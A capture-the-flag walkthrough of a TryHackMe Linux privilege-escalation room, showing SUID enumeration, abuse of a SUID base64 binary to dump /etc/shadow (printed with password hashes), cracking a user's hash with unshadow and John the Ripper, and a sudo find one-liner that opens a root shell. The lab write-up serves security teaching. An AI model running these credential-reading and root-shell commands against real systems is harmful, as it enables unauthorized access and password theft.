Linux Privilege Escalation: Capstone Challenge
- Platform: Try Hack Me
Challenge Setting
We are given leonard's credentials and are instructed to login as leonard via ssh, and escalate our privileges to get access to 2 flags.
This is a free room and you can find it here!
Walkthrough
After checking out leonard's sudo permissions, crontabs, capabilities etc. I decided to look at all the programs that have a set UID or GID:
find / -type f -perm -04000 -ls 2>/dev/null
The output was:
16779966 40 -rwsr-xr-x 1 root root 37360 Aug 20 2019 /usr/bin/base64
17298702 60 -rwsr-xr-x 1 root root 61320 Sep 30 2020 /usr/bin/ksu
17261777 32 -rwsr-xr-x 1 root root 32096 Oct 30 2018 /usr/bin/fusermount
17512336 28 -rwsr-xr-x 1 root root 27856 Apr 1 2020 /usr/bin/passwd
17698538 80 -rwsr-xr-x 1 root root 78408 Aug 9 2019 /usr/bin/gpasswd
17698537 76 -rwsr-xr-x 1 root root 73888 Aug 9 2019 /usr/bin/chage
17698541 44 -rwsr-xr-x 1 root root 41936 Aug 9 2019 /usr/bin/newgrp
17702679 208 ---s--x--- 1 root stapusr 212080 Oct 13 2020 /usr/bin/staprun
17743302 24 -rws--x--x 1 root root 23968 Sep 30 2020 /usr/bin/chfn
17743352 32 -rwsr-xr-x 1 root root 32128 Sep 30 2020 /usr/bin/su
17743305 24 -rws--x--x 1 root root 23880 Sep 30 2020 /usr/bin/chsh
17831141 2392 -rwsr-xr-x 1 root root 2447304 Apr 1 2020 /usr/bin/Xorg
17743338 44 -rwsr-xr-x 1 root root 44264 Sep 30 2020 /usr/bin/mount
17743356 32 -rwsr-xr-x 1 root root 31984 Sep 30 2020 /usr/bin/umount
17812176 60 -rwsr-xr-x 1 root root 57656 Aug 9 2019 /usr/bin/crontab
17787689 24 -rwsr-xr-x 1 root root 23576 Apr 1 2020 /usr/bin/pkexec
18382172 52 -rwsr-xr-x 1 root root 53048 Oct 30 2018 /usr/bin/at
20386935 144 ---s--x--x 1 root root 147336 Sep 30 2020 /usr/bin/sudo
34469385 12 -rwsr-xr-x 1 root root 11232 Apr 1 2020 /usr/sbin/pam_timestamp_check
34469387 36 -rwsr-xr-x 1 root root 36272 Apr 1 2020 /usr/sbin/unix_chkpwd
36070283 12 -rwsr-xr-x 1 root root 11296 Oct 13 2020 /usr/sbin/usernetctl
35710927 40 -rws--x--x 1 root root 40328 Aug 9 2019 /usr/sbin/userhelper
38394204 116 -rwsr-xr-x 1 root root 117432 Sep 30 2020 /usr/sbin/mount.nfs
958368 16 -rwsr-xr-x 1 root root 15432 Apr 1 2020 /usr/lib/polkit-1/polkit-agent-helper-1
37709347 12 -rwsr-xr-x 1 root root 11128 Oct 13 2020 /usr/libexec/kde4/kpac_dhcp_helper
51455908 60 -rwsr-x--- 1 root dbus 57936 Sep 30 2020 /usr/libexec/dbus-1/dbus-daemon-launch-helper
17836404 16 -rwsr-xr-x 1 root root 15448 Apr 1 2020 /usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-he
lper
18393221 16 -rwsr-xr-x 1 root root 15360 Oct 1 2020 /usr/libexec/qemu-bridge-helper
37203442 156 -rwsr-x--- 1 root sssd 157872 Oct 15 2020 /usr/libexec/sssd/krb5_child
37203771 84 -rwsr-x--- 1 root sssd 82448 Oct 15 2020 /usr/libexec/sssd/ldap_child
37209171 52 -rwsr-x--- 1 root sssd 49592 Oct 15 2020 /usr/libexec/sssd/selinux_child
37209165 28 -rwsr-x--- 1 root sssd 27792 Oct 15 2020 /usr/libexec/sssd/proxy_child
18270608 16 -rwsr-sr-x 1 abrt abrt 15344 Oct 1 2020 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
18535928 56 -rwsr-xr-x 1 root root 53776 Mar 18 2020 /usr/libexec/flatpak-bwrap
Right at the top we see the line below.
16779966 40 -rwsr-xr-x 1 root root 37360 Aug 20 2019 /usr/bin/base64
Checking out GTFOBins, we see that we can use base64 to encode and decode a file with root privileges.
This means we can effectively read any file on the system with root privileges.
Let's read /etc/shadow.
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
We get the output below:
root:$6$DWBzMoiprTTJ4gbW$g0szmtfn3HYFQweUPpSUCgHXZLzVii5o6PM0Q2oMmaDD9oGUSxe1yvKbnYsaSYHrUEQXTjIwOW/yrzV5HtIL51::0:99999:7:::
bin:*:18353:0:99999:7:::
daemon:*:18353:0:99999:7:::
adm:*:18353:0:99999:7:::
lp:*:18353:0:99999:7:::
sync:*:18353:0:99999:7:::
shutdown:*:18353:0:99999:7:::
halt:*:18353:0:99999:7:::
mail:*:18353:0:99999:7:::
operator:*:18353:0:99999:7:::
games:*:18353:0:99999:7:::
ftp:*:18353:0:99999:7:::
nobody:*:18353:0:99999:7:::
pegasus:!!:18785::::::
systemd-network:!!:18785::::::
dbus:!!:18785::::::
polkitd:!!:18785::::::
colord:!!:18785::::::
unbound:!!:18785::::::
libstoragemgmt:!!:18785::::::
saslauth:!!:18785::::::
rpc:!!:18785:0:99999:7:::
gluster:!!:18785::::::
abrt:!!:18785::::::
postfix:!!:18785::::::
setroubleshoot:!!:18785::::::
rtkit:!!:18785::::::
pulse:!!:18785::::::
radvd:!!:18785::::::
chrony:!!:18785::::::
saned:!!:18785::::::
apache:!!:18785::::::
qemu:!!:18785::::::
ntp:!!:18785::::::
tss:!!:18785::::::
sssd:!!:18785::::::
usbmuxd:!!:18785::::::
geoclue:!!:18785::::::
gdm:!!:18785::::::
rpcuser:!!:18785::::::
nfsnobody:!!:18785::::::
gnome-initial-setup:!!:18785::::::
pcp:!!:18785::::::
sshd:!!:18785::::::
avahi:!!:18785::::::
oprofile:!!:18785::::::
tcpdump:!!:18785::::::
leonard:$6$JELumeiiJFPMFj3X$OXKY.N8LDHHTtF5Q/pTCsWbZtO6SfAzEQ6UkeFJy.Kx5C9rXFuPr.8n3v7TbZEttkGKCVj50KavJNAm7ZjRi4/::0:99999:7:::
mailnull:!!:18785::::::
smmsp:!!:18785::::::
nscd:!!:18785::::::
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
Let's also cat the /etc/passwd file.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
colord:x:998:995:User for colord:/var/lib/colord:/sbin/nologin
unbound:x:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin
libstoragemgmt:x:996:993:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth:x:995:76:Saslauthd user:/run/saslauthd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster:x:994:992:GlusterFS daemons:/run/gluster:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
setroubleshoot:x:993:990::/var/lib/setroubleshoot:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
chrony:x:992:987::/var/lib/chrony:/sbin/nologin
saned:x:991:986:SANE scanner daemon user:/usr/share/sane:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
sssd:x:990:984:User for sssd:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
geoclue:x:989:983:User for geoclue:/var/lib/geoclue:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
gnome-initial-setup:x:988:982::/run/gnome-initial-setup/:/sbin/nologin
pcp:x:987:981:Performance Co-Pilot:/var/lib/pcp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/var/lib/oprofile:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
leonard:x:1000:1000:leonard:/home/leonard:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
missy:x:1001:1001::/home/missy:/bin/bash
We can now copy this data, and paste them into txt files on our attacking system as shadow.txt and passwd.txt respectively.
Then we can use unshadow to combine these 2 files into a format ready for some brute forcing.
unshadow passwd.txt shadow.txt > passwords.txt
Now we have a nicely formatted file, we can pass it to John The Ripper to attempt a brute force attack.
john passwords.txt
and success! we got a password 🙌🏻
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/opt/john/password.lst
notrealpassword (missy)
Now lets log in as missy:
su missy
#type password notrealpassword
Let's see where those flag files are:
find / -type f -name "*flag*txt" 2> /dev/null
/home/missy/Documents/flag1.txt
/home/rootflag/flag2.txt
It seems one flag is accessible by missy, but the other is only accessible by root.
Let's get missys flag.
cat /home/missy/Documents/flag1.txt
Ok, thats 1 flag down. Now let's become root to get the 2nd flag.
Let's look if missy has any sudo permissions.
sudo -l
Turns out she has sudo permissions for find!
Matching Defaults entries for missy on ip-10-10-31-46:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME
HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User missy may run the following commands on ip-10-10-31-46:
(ALL) NOPASSWD: /usr/bin/find
Searching find on GTFOBins we see that we can use the following command to get a root shell.
sudo find . -exec /bin/sh \; -quit
Now we are root!
id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Lets get the final flag 😎
cat /home/rootflag/flag2.txt